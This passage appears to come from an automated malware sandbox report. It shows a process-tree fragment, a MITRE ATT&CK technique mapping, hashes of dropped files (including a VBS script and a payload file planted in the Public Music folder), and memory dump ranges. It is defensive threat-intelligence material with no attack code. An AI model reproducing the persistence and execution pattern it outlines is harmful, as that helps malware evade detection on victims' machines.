    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:708

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
85ca8b3936901b68d3a3cb39929a9fb2

SHA1
6fdaf75628776ec050559858f1e75b4e2306d61c

SHA256
8e663b71325fc8d38d744acf0389740fef9af4d8cb84b6e5ad602d42d9492698

SHA512
1bd5d7b7963253629ec92ae427823e59917723a122bd8edf2c53d287b815f4ca071a47b2a2c2f395fc73b9f30a4fec69faace41632c2afd5da7ff238fc28c741

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\aspnet_compiler.exe.log

Filesize
425B

MD5
605f809fab8c19729d39d075f7ffdb53

SHA1
c546f877c9bd53563174a90312a8337fdfc5fdd9

SHA256
6904d540649e76c55f99530b81be17e099184bb4cad415aa9b9b39cc3677f556

SHA512
82cc12c3186ae23884b8d5c104638c8206272c4389ade56b926dfc1d437b03888159b3c790b188b54d277a262e731927e703e680ea642e1417faee27443fd5b3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
3127e06ce67a57f3a74e9371fa4b82f1

SHA1
1aa07a0eaf8718843eaa6ca7e17a04fdec2ea355

SHA256
b33f2539554f791ba674ae0f3792c53569eb3a73edeef86b4c2879eb080f2d5e

SHA512
5ec7cb1aedb0faad9980c3ca86eaca8bd114adbeba14596a8e3615392cbd3371701fa92f2bb5c92c523fca7cd6ad7bc72519ae9db73465e57e71189875150c3d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
814c6a5399c962b685b29d17f8f7ed8d

SHA1
b587c851dc09bcfb52b59db83ed5c6a2e5c96879

SHA256
4d01065b66bcb87a1384914fe23e1078cd237b5eab7571933aaaccf577f5c755

SHA512
9c70fb5756be0ce4d282d1801118cbb1676bcb88e5d7f686e9d4d923c00f78307bad59f4a15d70b20cb7851b6f0e2b0285075fad45b9767b9aff49f9274a61b2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
fdd94f6cdc0cc91aae1d251904b54653

SHA1
a39bd1b86cc4f1b93fa9b9790fd8d81f790bd27b

SHA256
2c6c262e283350e1048efbe61f603a06c798595abce0c31054539197265501e6

SHA512
7e21eec6fd44d24238638b62105030beab8d7c5ba827282502cf4303077069e5e9cf4eea59be6d45cc05443f159affa07bd6cf682314c319ad8d464bb27a0bfe

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
876b155a36abeef96ed74d73e22cfb35

SHA1
767e540304d1c0b7ed9f1b1fe86e162b4c1b97a1

SHA256
df01e659cd46c17a421766f295f16333d0fc87276de32ac99c9ed84301b9a2d1

SHA512
d70f5857ab939b525b48f892c3bc4ad05519cc9f8cb42308a24e5c735e49a85825ef02951ca592f21e0699526f9eb5a5543b66fb107dbdbe25a0ef083ffcb785

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
6d992abd498cc31b348557b604db2d92

SHA1
650b238f3d83a9082a6bba00165014f9e6c45af0

SHA256
f83d0bf0e5de668415a1fc814b67f9041dc7fba5713ec92f1c83256d63d956dd

SHA512
3a12a3614afbb77b0f525f87255f599b774caa40532b8b39ce3a1f8554f161c7ecd213f8e7381c8e98cd5d46bcf727f7011ad9da4676f0d3fa7a6bd8bb848900

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
ae59e1da3090006a9cf9f8b4b4a232d1

SHA1
6e7e60ea2c54ff86989bc85f276a29f2cf6b9770

SHA256
d80df5ff2ae4271411c8101686fbc5adba19b705cba97c2a62485aceda2d586e

SHA512
c408d22a077a3da41e82eba2828760d2e65e5ddf0a97c1ead7d2496d655008ca679c8c5d297fdc02cebfbf37c72fc0e4cb91d74fd59115bcd9b967d0ebdaa398

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
8196703cb7fe7324866cdad533c00c05

SHA1
3a0d64a70cd1a41fec3697c648439617c402a7ba

SHA256
8ebb424e926d1c62353c8211a2579adcc58f124562c30d369dab5811869fa94f

SHA512
9a82c0e882a2982556b76c0770a79801aef5ba2ff79db33fabbf096c7b43e38cd25a3cebdccc7cb44cd02ef927569b8dc87586e31542bb10cc3211ade354ccb2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
0b5f54ce57488a1e5ae5ab710b79d73c

SHA1
6e0214381b17d16e7c7fb51b8d166adfda2f1104

SHA256
2a634ec6b5622da5ebbe125ffccddeff4c937c13fd8112d87bb85973f5cf58bc

SHA512
1614b3c233ab60bd437afd382e2512c810e78d0fde0bb4b033b63fd905ae6e01c4768a3b4915a26ba657dc301f82081426193aaa5f18f1d78f14ffccea738a6f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
9c22e96a83226a7d926da4b84ae3e1b2

SHA1
ad5f8aa0ff6c90050472fe8791318eaa776fbf7f

SHA256
34cd92c1507de64db57e44e9e23e11fd913c78c60fc1f6ebcac3f4838b0ec088

SHA512
0947b433460ef34a518cab681dbce4704fc37c59a4a097ab84c04e5de8d44c126ea1678367bb5c385d0d2e13fceb07847a15d450fedbba7105caf9e6fee9bf16

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
7b7c2d31f6a39104102bd9778fb34b97

SHA1
5f2f249d3e381c824b46a101b928378ce81666b5

SHA256
39c363b873a430c49c9175c56150c78fe9fccdbeda3eac413a855175409bb3f7

SHA512
ee7c7a597d33b045dc3a79361db9538eec99e6a99d3e4e9452bbc125c81feb7cc63ec222bd8506c26d40854b861014f18f19d97a9f3c1b9069a7aceb30625937

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
324eb868b2220ace0f1d9f9cefefc876

SHA1
ff4750af40685c3280d3f094a3f5b1eb86077e09

SHA256
a398c80a4875966e8bc0fac257e207de3100a78ac7243ac8aba5179caa562ba8

SHA512
fbfe7171f3ba135168a5905cb6f38c688ec4b5d6008d0ac206f1d5da09f48a5afc9d69fb920581f5344d63efca39f4840f6a1874bc324bd99fbe1ae0cbdb4c16

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
eb972331956e6ae137c92f9da67d3618

SHA1
e313b9d0ba9b32c32ec379d988ce632e5383894d

SHA256
face3a26c7a1811dac011e999e95412c0385e84063cbc5d60864b1d5cb41eeee

SHA512
2d250b18c86c7cb3129923af60945d85f8ed9924550cb7381cb497c863b7f9c49ece39f04fbb0bf84f87f777fa5c2d9623f23789c40aad425446354ae448d535

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
ae5364d493ec15f4b2126d2d14d9ea10

SHA1
9e4c045a9ad0643f91f0c085d82be4279cfd30a6

SHA256
6e2a759430d6019de0b7d307131ccf09664ee11aadbf4defd31e945669b260b4

SHA512
883b922f6b8c06c5119375a5bd06151dd78352c225f701ddfcf63fde0ef25de781dc5741c111fea055c6025f618fb2c5e06b735049b9c20206bdc016a55ba807

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
13bb234f5351943c131c4f399231c67a

SHA1
0c5e720770a0492e0868e8b2524a1275e421bac2

SHA256
b469e3904b92761cb7bf4ce42be84b68d92a10cb6e4658d7dfb14501e7b7104c

SHA512
41fbfe5b9f4cdb6a612639c4ac37fe351ced513ddab55f47fb82caf6c81a54aff260e33f67f12070a60fb1f253b379248e64855ff4c6ea42491a177bd3d44dad

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
c9beba73a346cc487ac65ef88a7defdc

SHA1
1881a8267cfcb969876f1b2af3a314621f2378f9

SHA256
a111984cd78244301d1e59066e460e7e7b8b6bdefd20a66d65c8a0a7c2205b54

SHA512
23d396ef7b3769d227116b16b3a899abe27de00e5c4734707fa966f0273ae5c14f380377f1d479b0f0622af36f9ba5a55a219e382d46cefd59fc7ccc588fe39b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
6992c35537e8a888217e333964ecd52d

SHA1
5e5719a18eb16e4be1e1536634c1f66c5db72abe

SHA256
0c732d4807a7ada4aaebbd0b8f34d5105d3b834cdf68260680bc9df7e859104c

SHA512
2c05fb9d973f64ec0e2c1d6dd733564bc96c2fc9f9b274c62e85a4e6e017f18d49cd160de5a66f613616cd83becbca89a6955c990229d4ce2390332bd2f2961a

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_za2mwkio.mda.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Public\Music\SFYZCOEBMGAPWXV.xml

Filesize
1KB

MD5
26913303151afee791eb652db6764fe2

SHA1
49418253140caeacb2a1b5bfac48f4bc8e8d5b24

SHA256
14c815402dddbe953b9fd494e873d453251b3ec6ad996f5000174882040ba248

SHA512
5e7b1045e34f0f39303dfecc0e601b8212b32acfa466642db1f4e9a0332fbdaffc5762aaf252385d974a1dd37f062e424a3fda5cad5317b1128dbd5b66f09141

Download Submit
C:\Users\Public\Music\TvMusic.music

Filesize
436KB

MD5
102ea8e9f6612e0806199ea3376f610a

SHA1
73f3c4e18948145292446c793ce7218c30434972

SHA256
3b499f0e17a2b03a5fcb8c25c85eee9ee06b23c04c72d3cad42a79632d39de18

SHA512
dd32531c51c60b2d45ee343209f535a30712b7558bc0c86e527eb7225b0846275bf3893fc5850cee7f736dc84cae6103c512b437080b837b167f267a39b34c43

Download Submit
C:\Users\Public\Music\TvMusic.vbs

Filesize
229B

MD5
66a1516e1d1e821084441211567d2e87

SHA1
0e688c9a93ad2cc162ef48ca75e0148e69d95ab1

SHA256
d57293641ff05fea6af21fb73a4064eca49e5979f2395305bdea2a00a5de6717

SHA512
1b77505b03a4a9c2c9437fbb94e828f34ed5b74187a258443af778b9450dc346e7027267e4ad6d33ff96c4036d936eba9dee05efbe136678bec6d0f7b68ecf12

Download Submit
memory/1004-3-0x00007FFAEFCA3000-0x00007FFAEFCA4000-memory.dmp

Filesize
4KB

Download
memory/1004-76-0x000001F2F8E20000-0x000001F2F8FE2000-memory.dmp

Filesize
1.8MB

Download
memory/1004-86-0x00007FFAEFCA0000-0x00007FFAF068C000-memory.dmp

Filesize
9.9MB

Download
memory/1004-8-0x000001F2F8460000-0x000001F2F8482000-memory.dmp

Filesize
136KB

Download
memory/1004-13-0x000001F2F8610000-0x000001F2F8686000-memory.dmp

Filesize
472KB

Download
memory/1004-81-0x000001F2F9520000-0x000001F2F9A46000-memory.dmp

Filesize
5.1MB

Download
memory/1004-15-0x00007FFAEFCA0000-0x00007FFAF068C000-memory.dmp

Filesize
9.9MB

Download
memory/1004-14-0x00007FFAEFCA0000-0x00007FFAF068C000-memory.dmp

Filesize
9.9MB

Download
memory/1004-64-0x00007FFAEFCA0000-0x00007FFAF068C000-memory.dmp

Filesize
9.9MB

Download
memory/1004-30-0x00007FFAEFCA0000-0x00007FFAF068C000-memory.dmp

Filesize
9.9MB

Download
memory/1004-31-0x00007FFAEFCA3000-0x00007FFAEFCA4000-memory.dmp

Filesize
4KB

Download
memory/1004-32-0x00007FFAEFCA0000-0x00007FFAF068C000-memory.dmp

Filesize
9.9MB

Download
memory/3492-67-0x0000000005920000-0x000000000592A000-memory.dmp

Filesize
40KB

Download
memory/3492-60-0x0000000000400000-0x0000000000416000-memory.dmp

Filesize
88KB

Download
memory/3492-65-0x0000000005C50000-0x000000000614E000-memory.dmp

Filesize
5.0MB

Download
memory/3492-66-0x0000000005960000-0x00000000059F2000-memory.dmp

Filesize
584KB

Download
memory/3492-70-0x0000000006C20000-0x0000000006CBC000-memory.dmp

Filesize
624KB

Download
memory/3492-71-0x0000000006CC0000-0x0000000006D26000-memory.dmp

Filesize
408KB

Download
memory/3732-243-0x0000000001300000-0x00000000013AE000-memory.dmp

Filesize
696KB

Download
memory/5000-59-0x0000022169DF0000-0x0000022169DFC000-memory.dmp

Filesize
48KB

Download